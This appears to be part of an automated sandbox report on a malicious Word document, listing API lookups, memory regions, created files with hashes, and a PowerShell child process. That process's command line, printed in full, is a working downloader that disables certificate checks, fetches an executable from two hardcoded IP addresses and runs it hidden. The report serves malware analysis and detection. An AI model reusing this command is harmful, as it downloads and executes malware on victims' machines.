| Get Address | Unknown module name | function = MsoCpgFromChs, address_out = 0x7fee34b6660 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetLocale, address_out = 0x7fee34b1500 |
|
1 | |
| Get Address | Unknown module name | function = MsoFSetHMsoinstOfSdm, address_out = 0x7fee34b3dd0 |
|
1 | |
| Get Address | Unknown module name | function = MsoSetVbaInterfaces, address_out = 0x7fee35b71e0 |
|
1 | |
| Get Address | Unknown module name | function = MsoGetControlInstanceId, address_out = 0x7fee3586d10 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiFIsEdpEnabled, address_out = 0x7fee35f98e0 |
|
1 | |
| Get Address | Unknown module name | function = VbeuiEnterpriseProtect, address_out = 0x7fee35f9830 |
|
1 | |
| Get Address | Unknown module name | function = SysFreeString, address_out = 0x7feff381320 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLib, address_out = 0x7feff38f1e0 |
|
1 | |
| Get Address | Unknown module name | function = RegisterTypeLib, address_out = 0x7feff3dcaa0 |
|
1 | |
| Get Address | Unknown module name | function = QueryPathOfRegTypeLib, address_out = 0x7feff411760 |
|
1 | |
| Get Address | Unknown module name | function = UnRegisterTypeLib, address_out = 0x7feff4120d0 |
|
2 | |
| Get Address | Unknown module name | function = OleTranslateColor, address_out = 0x7feff3ac760 |
|
1 | |
| Get Address | Unknown module name | function = OleCreateFontIndirect, address_out = 0x7feff3decd0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePictureIndirect, address_out = 0x7feff3de840 |
|
1 | |
| Get Address | Unknown module name | function = OleLoadPicture, address_out = 0x7feff3ef420 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrameIndirect, address_out = 0x7feff3e4ec0 |
|
1 | |
| Get Address | Unknown module name | function = OleCreatePropertyFrame, address_out = 0x7feff3e9350 |
|
1 | |
| Get Address | Unknown module name | function = OleIconToCursor, address_out = 0x7feff3b6e40 |
|
1 | |
| Get Address | Unknown module name | function = LoadTypeLibEx, address_out = 0x7feff38a550 |
|
2 | |
| Get Address | Unknown module name | function = OleLoadPictureEx, address_out = 0x7feff3ef320 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetSystemMetrics, address_out = 0x774f94f0 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromWindow, address_out = 0x774f5f08 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromRect, address_out = 0x774f2b00 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = MonitorFromPoint, address_out = 0x774eab64 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayMonitors, address_out = 0x774f5c30 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = GetMonitorInfoA, address_out = 0x774ea730 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = EnumDisplayDevicesA, address_out = 0x774ea5b4 |
|
1 | |
| Get Address | Unknown module name | function = DispCallFunc, address_out = 0x7feff382270 |
|
1 | |
| Get Address | Unknown module name | function = CreateTypeLib2, address_out = 0x7feff40dbd0 |
|
1 | |
| Get Address | Unknown module name | function = VarDateFromUdate, address_out = 0x7feff385c90 |
|
1 | |
| Get Address | Unknown module name | function = VarUdateFromDate, address_out = 0x7feff386330 |
|
1 | |
| Get Address | Unknown module name | function = GetAltMonthNames, address_out = 0x7feff3a66c0 |
|
1 | |
| Get Address | Unknown module name | function = VarNumFromParseNum, address_out = 0x7feff384710 |
|
1 | |
| Get Address | Unknown module name | function = VarParseNumFromStr, address_out = 0x7feff3848f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR4, address_out = 0x7feff3bb640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromR8, address_out = 0x7feff3bb360 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromDate, address_out = 0x7feff3c2640 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromI4, address_out = 0x7feff3a58a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecFromCy, address_out = 0x7feff3a5820 |
|
1 | |
| Get Address | Unknown module name | function = VarR4FromDec, address_out = 0x7feff3baf20 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromTypeInfo, address_out = 0x7feff3da0c0 |
|
1 | |
| Get Address | Unknown module name | function = GetRecordInfoFromGuids, address_out = 0x7feff412160 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetRecordInfo, address_out = 0x7feff3a5af0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetRecordInfo, address_out = 0x7feff3a5a90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayGetIID, address_out = 0x7feff3a5a60 |
|
1 | |
| Get Address | Unknown module name | function = SafeArraySetIID, address_out = 0x7feff3a5a30 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCopyData, address_out = 0x7feff3860b0 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayAllocDescriptorEx, address_out = 0x7feff383e90 |
|
1 | |
| Get Address | Unknown module name | function = SafeArrayCreateEx, address_out = 0x7feff3d9f80 |
|
1 | |
| Get Address | Unknown module name | function = VarFormat, address_out = 0x7feff409b20 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatDateTime, address_out = 0x7feff409aa0 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatNumber, address_out = 0x7feff409990 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatPercent, address_out = 0x7feff409890 |
|
1 | |
| Get Address | Unknown module name | function = VarFormatCurrency, address_out = 0x7feff409770 |
|
1 | |
| Get Address | Unknown module name | function = VarWeekdayName, address_out = 0x7feff3eb8d0 |
|
1 | |
| Get Address | Unknown module name | function = VarMonthName, address_out = 0x7feff3eb800 |
|
1 | |
| Get Address | Unknown module name | function = VarAdd, address_out = 0x7feff4048e0 |
|
1 | |
| Get Address | Unknown module name | function = VarAnd, address_out = 0x7feff409470 |
|
1 | |
| Get Address | Unknown module name | function = VarCat, address_out = 0x7feff4096a0 |
|
1 | |
| Get Address | Unknown module name | function = VarDiv, address_out = 0x7feff402fe0 |
|
1 | |
| Get Address | Unknown module name | function = VarEqv, address_out = 0x7feff409cf0 |
|
1 | |
| Get Address | Unknown module name | function = VarIdiv, address_out = 0x7feff408ff0 |
|
1 | |
| Get Address | Unknown module name | function = VarImp, address_out = 0x7feff409c00 |
|
1 | |
| Get Address | Unknown module name | function = VarMod, address_out = 0x7feff408e60 |
|
1 | |
| Get Address | Unknown module name | function = VarMul, address_out = 0x7feff403690 |
|
1 | |
| Get Address | Unknown module name | function = VarOr, address_out = 0x7feff4092d0 |
|
1 | |
| Get Address | Unknown module name | function = VarPow, address_out = 0x7feff402e80 |
|
1 | |
| Get Address | Unknown module name | function = VarSub, address_out = 0x7feff403f90 |
|
1 | |
| Get Address | Unknown module name | function = VarXor, address_out = 0x7feff4091a0 |
|
1 | |
| Get Address | Unknown module name | function = VarAbs, address_out = 0x7feff3e7c30 |
|
1 | |
| Get Address | Unknown module name | function = VarFix, address_out = 0x7feff3e7a60 |
|
1 | |
| Get Address | Unknown module name | function = VarInt, address_out = 0x7feff3e7890 |
|
1 | |
| Get Address | Unknown module name | function = VarNeg, address_out = 0x7feff3e7ea0 |
|
1 | |
| Get Address | Unknown module name | function = VarNot, address_out = 0x7feff409600 |
|
1 | |
| Get Address | Unknown module name | function = VarRound, address_out = 0x7feff3e76a0 |
|
1 | |
| Get Address | Unknown module name | function = VarCmp, address_out = 0x7feff4083f0 |
|
1 | |
| Get Address | Unknown module name | function = VarDecAdd, address_out = 0x7feff3b3070 |
|
1 | |
| Get Address | Unknown module name | function = VarDecCmp, address_out = 0x7feff3bd700 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCat, address_out = 0x7feff3bd890 |
|
1 | |
| Get Address | Unknown module name | function = VarCyMulI4, address_out = 0x7feff39caf0 |
|
1 | |
| Get Address | Unknown module name | function = VarBstrCmp, address_out = 0x7feff3a8a00 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x7fee34bfcd0 |
|
1 | |
| Get Address | Unknown module name | address_out = 0x0 |
|
1 | |
| Get Address | Unknown module name | function = 516, address_out = 0x7fee3dfd760 |
|
3 | |
| Get Address | Unknown module name | function = 716, address_out = 0x7fee3fd24c8 |
|
3 | |
| Get Address | Unknown module name | function = 608, address_out = 0x7fee3dfae28 |
|
3 | |
| Get Address | Unknown module name | function = 632, address_out = 0x7fee3dfd6f0 |
|
3 |
Window (1)
| Operation | Window Name | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | - | class_name = ThunderMain, wndproc_parameter = 0 |
|
1 |
System (24)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Cursor | x_out = 571, y_out = 137 |
|
2 | |
| Get Cursor | x_out = 12, y_out = 70 |
|
1 | |
| Get Time | type = System Time, time = 2019-02-06 16:41:07 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 107609 |
|
1 | |
| Get Time | type = Local Time, time = 2019-02-06 16:41:10 (Local Time) |
|
12 | |
| Get Time | type = Local Time, time = 2019-02-06 16:41:11 (Local Time) |
|
3 | |
| Get Info | type = Operating System |
|
2 | |
| Get Info | type = Operating System |
|
2 |
Environment (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | name = DDRYBUR |
|
1 |
Process #2: powershell.exe
652
89
| Information | Value |
|---|---|
| ID | #2 |
| File Name | c:\windows\system32\windowspowershell\v1.0\powershell.exe |
| Command Line | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#11#> function <#new function release#> split-strings([string] $string1){$beos1=1;try{[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }; (new-object system.net.webclient <#replace ext#> ).downloadfile($string1,($env:temp+'\fulezad.exe'));}catch{$beos1=0;}return $beos1;}$mmb1=@('64.44.51.87/electra.crm','89.46.223.114/electra.crm');foreach ($bifa in $mmb1){if(split-strings('https://'+$bifa) -eq 1){break;} };<#validate component#>start-process ($env:temp+'\fulezad.exe') -windowstyle hidden;" |
| Initial Working Directory | C:\Users\aETAdzjz\Desktop\ |
| Monitor | Start Time: 00:00:49, Reason: Child Process |
| Unmonitor | End Time: 00:01:26, Reason: Self Terminated |
| Monitor Duration | 00:00:37 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xac8 |
| Parent PID | 0x948 (c:\program files\microsoft office\root\office16\winword.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | YKYD69Q\aETAdzjz |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
ACC
0x
AE0
0x
AE4
0x
AE8
0x
AEC
0x
AF0
0x
AF4
0x
B48
0x
B8C
0x
B90
0x
818
0x
828
0x
628
0x
6C8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x0002ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000050000 | 0x00050000 | 0x00056fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000060000 | 0x00060000 | 0x00061fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000070000 | 0x00070000 | 0x0016ffff | Private Memory | rw |
|
|
|
- |
| powershell.exe.mui | 0x00170000 | 0x00172fff | Memory Mapped File | rw |
|
|
|
- |
| private_0x0000000000180000 | 0x00180000 | 0x00180fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001a0000 | 0x001a0000 | 0x001affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0024ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00250000 | 0x002b6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x003bffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000003c0000 | 0x003c0000 | 0x00547fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000550000 | 0x00550000 | 0x006d0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000006e0000 | 0x006e0000 | 0x01adffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001ae0000 | 0x01ae0000 | 0x01bdffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001be0000 | 0x01be0000 | 0x01be1fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001bf0000 | 0x01bf0000 | 0x01bf0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c00000 | 0x01c00000 | 0x01c01fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.2.db | 0x01c10000 | 0x01c13fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000018.db | 0x01c20000 | 0x01c3ffff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001c40000 | 0x01c40000 | 0x01c4ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001c50000 | 0x01c50000 | 0x01c50fff | Pagefile Backed Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000001c.db | 0x01c60000 | 0x01c8ffff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x01c90000 | 0x01c93fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000001ca0000 | 0x01ca0000 | 0x01ca0fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001cb0000 | 0x01cb0000 | 0x01cb2fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001cc0000 | 0x01cc0000 | 0x01cc0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001cd0000 | 0x01cd0000 | 0x01cdffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d5ffff | Private Memory | rw |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01d60000 | 0x01dc5fff | Memory Mapped File | r |
|
|
|
- |
| l_intl.nls | 0x01dd0000 | 0x01dd2fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000001de0000 | 0x01de0000 | 0x01e5ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000001e60000 | 0x01e60000 | 0x01f3efff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01f40000 | 0x0220efff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002210000 | 0x02210000 | 0x02210fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002220000 | 0x02220000 | 0x0229ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000022a0000 | 0x022a0000 | 0x02692fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000026a0000 | 0x026a0000 | 0x026bffff | Private Memory | - |
|
|
|
- |
| sorttbls.nlp | 0x026c0000 | 0x026c4fff | Memory Mapped File | r |
|
|
|
- |
| microsoft.wsman.runtime.dll | 0x026d0000 | 0x026d7fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00000000026e0000 | 0x026e0000 | 0x026effff | Private Memory | rw |
|
|
|
- |
| sortkey.nlp | 0x026f0000 | 0x02730fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000002740000 | 0x02740000 | 0x02740fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000002750000 | 0x02750000 | 0x02750fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000002760000 | 0x02760000 | 0x027dffff | Private Memory | rw |
|
|
|
- |
| mscorrc.dll | 0x027e0000 | 0x02833fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000002850000 | 0x02850000 | 0x028cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002950000 | 0x02950000 | 0x029cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002a80000 | 0x02a80000 | 0x02afffff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000002b00000 | 0x02b00000 | 0x02bfffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002c00000 | 0x02c00000 | 0x02d00fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002d50000 | 0x02d50000 | 0x02dcffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002dd0000 | 0x02dd0000 | 0x1adcffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001add0000 | 0x1add0000 | 0x1b49ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000001b530000 | 0x1b530000 | 0x1b5affff | Private Memory | rw |
|
|
|
- |
| system.management.automation.dll | 0x1b5b0000 | 0x1b891fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll.mui | 0x1b8a0000 | 0x1b95ffff | Memory Mapped File | rw |
|
|
|
- |
| private_0x000000001b960000 | 0x1b960000 | 0x1ba5ffff | Private Memory | rw |
|
|
|
- |
| system.transactions.dll | 0x1e230000 | 0x1e278fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcr80.dll | 0x74e60000 | 0x74f28fff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x773c0000 | 0x774defff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x774e0000 | 0x775d9fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x775e0000 | 0x77788fff | Memory Mapped File | rwx |
|
|
|
- |
| psapi.dll | 0x777a0000 | 0x777a6fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | r |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| powershell.exe | 0x13fbe0000 | 0x13fc56fff | Memory Mapped File | rwx |
|
|
|
- |
| culture.dll | 0x642ff4a0000 | 0x642ff4a9fff | Memory Mapped File | rwx |
|
|
|
- |
| system.directoryservices.ni.dll | 0x7fedf040000 | 0x7fedf1d4fff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.ni.dll | 0x7fedf1e0000 | 0x7fedf34bfff | Memory Mapped File | rwx |
|
|
|
- |
| system.xml.ni.dll | 0x7fedf350000 | 0x7fedf9f4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.security.ni.dll | 0x7fedfc80000 | 0x7fedfcbdfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.management.ni.dll | 0x7fedfcc0000 | 0x7fedfdd7fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.utility.ni.dll | 0x7fedfde0000 | 0x7fedfff5fff | Memory Mapped File | rwx |
|
|
|
- |
| system.transactions.ni.dll | 0x7fee0000000 | 0x7fee00e4fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.wsman.management.ni.dll | 0x7fee00f0000 | 0x7fee0199fff | Memory Mapped File | rwx |
|
|
|
- |
| system.configuration.install.ni.dll | 0x7fee01a0000 | 0x7fee01d1fff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.commands.diagnostics.ni.dll | 0x7fee01e0000 | 0x7fee0248fff | Memory Mapped File | rwx |
|
|
|
- |
| system.core.ni.dll | 0x7fee0250000 | 0x7fee057dfff | Memory Mapped File | rwx |
|
|
|
- |
| system.management.automation.ni.dll | 0x7fee0580000 | 0x7fee10dcfff | Memory Mapped File | rwx |
|
|
|
- |
| microsoft.powershell.consolehost.ni.dll | 0x7fee10e0000 | 0x7fee1191fff | Memory Mapped File | rwx |
|
|
|
- |
| system.ni.dll | 0x7fee11a0000 | 0x7fee1bc2fff | Memory Mapped File | rwx |
|
|
|
- |
| mscorlib.ni.dll | 0x7fee1c30000 | 0x7fee2b0bfff | Memory Mapped File | rwx |
|
|
|
- |
| mscorwks.dll | 0x7fee2b10000 | 0x7fee34acfff | Memory Mapped File | rwx |
|
|
|
- |
| mscoreei.dll | 0x7fee5c30000 | 0x7fee5cc8fff | Memory Mapped File | rwx |
|
|
|
- |
| mscoree.dll | 0x7fee5cd0000 | 0x7fee5d3efff | Memory Mapped File | rwx |
|
|
|
- |
| linkinfo.dll | 0x7fef82d0000 | 0x7fef82dbfff | Memory Mapped File | rwx |
|
|
|
- |
| shdocvw.dll | 0x7fef82e0000 | 0x7fef8313fff | Memory Mapped File | rwx |
|
|
|
- |
| ntshrui.dll | 0x7fef8d70000 | 0x7fef8deffff | Memory Mapped File | rwx |
|
|
|
- |
| cscapi.dll | 0x7fef8e70000 | 0x7fef8e7efff | Memory Mapped File | rwx |
|
|
|
- |
| apphelp.dll | 0x7fefa5e0000 | 0x7fefa636fff | Memory Mapped File | rwx |
|
|
|
- |
| slc.dll | 0x7fefb0d0000 | 0x7fefb0dafff | Memory Mapped File | rwx |
|
|
|
- |
| atl.dll | 0x7fefb100000 | 0x7fefb118fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x7fefb4a0000 | 0x7fefb4ccfff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x7fefbe50000 | 0x7fefbea5fff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x7fefbeb0000 | 0x7fefbfdbfff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x7fefc030000 | 0x7fefc223fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x7fefc6f0000 | 0x7fefc6fbfff | Memory Mapped File | rwx |
|
|
|
- |
| userenv.dll | 0x7fefc8d0000 | 0x7fefc8edfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x7fefcb20000 | 0x7fefcb66fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x7fefce20000 | 0x7fefce36fff | Memory Mapped File | rwx |
|
|
|
- |
| srvcli.dll | 0x7fefd320000 | 0x7fefd342fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x7fefd420000 | 0x7fefd42efff | Memory Mapped File | rwx |
|
|
|
- |
| profapi.dll | 0x7fefd530000 | 0x7fefd53efff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x7fefd6c0000 | 0x7fefd6d9fff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x7fefd6e0000 | 0x7fefd74afff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd8c0000 | 0x7fefd8f5fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x7fefd970000 | 0x7fefda78fff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x7fefda80000 | 0x7fefdbacfff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x7fefdce0000 | 0x7fefdcedfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x7fefdcf0000 | 0x7fefdd60fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x7fefdd70000 | 0x7fefde38fff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x7fefde50000 | 0x7fefebd7fff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x7fefebe0000 | 0x7fefec0dfff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x7fefed90000 | 0x7fefee6afff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x7fefee70000 | 0x7feff072fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x7feff2e0000 | 0x7feff37efff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x7feff380000 | 0x7feff456fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x7feff4e0000 | 0x7feff531fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x7feff540000 | 0x7feff5a6fff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x7feff5b0000 | 0x7feff648fff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x7feff650000 | 0x7feff826fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x7feff830000 | 0x7feff84efff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x7feff900000 | 0x7feff900fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x000007ff00020000 | 0x7ff00020000 | 0x7ff0002ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff000dffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000e0000 | 0x7ff000e0000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff0015ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00160000 | 0x7ff00160000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff00000 | 0x7fffff00000 | 0x7fffff0ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff9ffff | Private Memory | rwx |
|
|
|
- |
| private_0x000007fffffae000 | 0x7fffffae000 | 0x7fffffaffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000007fffffdf000 | 0x7fffffdf000 | 0x7fffffdffff | Private Memory | rw |
|
|
|
- |
|
For performance reasons, the remaining 93 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| C:\Users\aETAdzjz\AppData\Roaming\cleanmem\fumezad.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 SSDeep: 3:: |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar1111.tmp | 126.77 KB |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 SSDeep: 1536:blzA+FFTLO9oHCLYyBFfLARZk2YueKQR7A/MGs:blH7RHCVBFERxeKh/6 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab1110.tmp | 52.71 KB |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 SSDeep: 1536:26Ley1Fr+ZuhxsffPTWBbJR51GpX/RCy7Y22JO8jd:NLZxufLURrGJ/UZdh |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar2946.tmp | 134.03 KB |
MD5:
b463cd6c6009093970e280027c2a4464
SHA1: 1a3b9cc56839a880ad3f1e8be1133e0af31c7437 SHA256: 6e4b7d405ab1ad163119355e28d1d385b2b9c45d114dca7e819849d3057afa33 SSDeep: 1536:nr6GvaYIqKl0YKuQPM4FSXUy/k8ER711MtvU/cRZsGxK:n2VYLKlnXR5ER7TEXjK |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab2935.tmp | 55.22 KB |
MD5:
a902cf373e02f7dc34f456ed7449279c
SHA1: 9d2aad0f901326cf1bee66ce68fd5b79b39ad76d SHA256: ea0c12aedea644678014991a96534145e85aa12cd8955396dfdc98a4fc96f0d5 SSDeep: 1536:e0o4QkMR6NylTBWlMJ29/zaWzePccAU6EB18iyvP:sL4clTBWScGZyvP |
|
|
